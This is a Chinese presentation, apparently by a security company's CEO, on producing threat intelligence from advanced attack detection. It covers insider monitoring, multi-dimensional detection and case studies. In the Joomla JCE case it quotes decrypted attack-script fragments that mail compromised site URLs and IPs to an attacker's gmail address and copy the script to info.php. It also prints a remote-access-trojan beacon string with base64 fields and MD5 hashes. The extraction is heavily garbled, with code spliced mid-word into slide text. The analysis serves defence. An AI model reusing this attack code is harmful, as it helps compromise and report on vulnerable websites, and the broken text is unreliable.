如何产生威胁情报高级恶意攻击案例分析

《如何产生威胁情报高级恶意攻击案例分析》由会员上传分享，免费在线阅读，更多相关内容在学术论文-天天文库。

1、如何产生威胁情报-高级恶意攻击案例分析神州网云CEO宋超Content目录1高级恶意攻击检测&威胁情报2多维检测与威胁情报3重要线索的分析工作及案例分析4威胁情报与高级恶意攻击检测价值体现5未来高级恶意攻击检测和威胁情报的趋势C目录ONTENTS01高级恶意攻击检测&威胁情报目前高级恶意攻击影响到国家多行业多领域电信网络设备遭受攻击银行诈骗、盗取资金安全企业商业情报及知识产权被窃取防御国家发现具有窃密行为的攻击能源具有破坏行为的攻击检测过程中面临的问题发现高级恶意攻击行为怎样从海量告警线索中发现高质量的攻击线索产生怎样从单一的攻击

2、线索中扩展更多有效线索损失攻击者的目的、动机、背景结合威胁情报落地内部威胁、外部威胁、关键资产的监测关键通过分析内部网络流量，采用机器学习的方式自动化的识别组织内的安全资产（设备）资产并且打上标识，可根据资产上存放的数据的重要程度及资产的使用者的重要性来确定是否是关键资产监测多数用户的网络行为是可预测的。恶意的内部人员在偷盗数据或搞破坏前一定有异常的行为。对于可疑的员工连接关键资产一定要引起足够重视。这种异常不一定是一个违规内部行为，可以结合外部的威胁情报作为重要的调查信息。案例：通过外部威胁情报获取公威胁司员工在招聘网站有简历变动的情况，有

3、可能会离职，结合上面发现的可疑员工的违规行为判断出内部危胁情况传统局部的、各自为政的、基于特征的信息安全解决方案在当今世界信息安全争夺战中外部已经暴露出极大的不足，高级恶意攻击检测类系统结合威胁情报对已知及未知威胁的恶威胁意行为实现早期的快速发现，并可对受害目标及攻击源头进行精准定位，最终达到对入侵途径及攻击者背景的研判与溯源，把危害损失降到最小。C目录ONTENTS02多维检测与威胁情报全方位攻击检测流程图多角度不同视点看高级恶意攻击检测线索分析多维度分析多维威胁情报库中包含全球APT攻击事件、各种远控木马、扫描器、webshell等规则针对

4、各种攻击行为进行识别Part03发现一条重要线索针对发现重要线索进行下一步工作及案例分析全球著名的joomla内容管理系统漏洞专家取证分析通知用户方对报警数据进行进行后续的漏取证分析洞修补及防护工作网镜高级恶意威胁检测系统威胁情报恶意行为告警中主动发现结合威胁情报恶意攻击行为对线索进行查询、溯源分析网镜高级恶意感胁检测系统恶意行为告警中主动发现的攻击行为数据包解析出告警攻击数据的内容分析后续的攻击特征解密后的部分代码$serper=gethostbyname($_SERVER['SERV分析代码可知程序为自动化攻joomla网ER_ADDR']

5、);站，利用的漏洞是joomlajce漏洞，攻$injektor=击成功会给调用linux系统的mail函数给gethostbyname($_SERVER['REMOTE_ADD攻击者gmail邮箱发送邮件，内容为存在R']);漏洞的网站url和ip地址mail("vir.lin90@gmail.com","$body","HasilBajakanhttp://$web$inj$securityIPServer=$serperIPInjector=$injektor");产生威胁情报的重要线索：$_SESSION['bajak']=

6、0;}vir.lin90@gmail.comelse{$_SESSION['bajak']++;};if(isset($_GET['clone'])){漏洞认证情况及修补工作$source=$_SERVER['SCRIPT_FILENAME'];$desti=$_SERVER['DOCUMENT_ROOT']."/info.php";Part04威胁情报与多维检测价值体现怎样发现攻击事件中的关键点［案例］lv

7、'

8、'

9、2YLYr9mK2YVfQzQyMzlGMzA=

10、'

11、'

12、PERSONNEL5-PC

13、'

14、'

15、user

16、'

17、'

18、1436-05-

19、06

20、'

21、'

22、SAU

23、'

24、'

25、Win7ProfessionalSP1x86

26、'

27、'

28、No

29、'

30、'

31、0.5.0E

32、'

33、'

34、..

35、'

36、'

37、2LTYp9iqINiz2YjYp9mE2YHZhtinINin2YTYtdmI2KrZiiAtIFdpbmRvd3MgSW50ZXJuZXQgRXhwbG9yZXI=

38、'

39、'

40、682dfec8c66a0de6f1475ca73c462a69,39b7927e0d4deb5c10fb380b7c53c617,[endof]利用威胁情报在高级攻击检测中进行多维线索扩线利用圈中所画的[endof]特征对历史数据进行可

41、视化关联分析得到我们所需要的MD5、域名、ＩＰ、ＵＲＬ、木马样本及分析报告等重要信息[endof]利用威胁情报在高级攻击检测中进行多维线索扩线利用圈中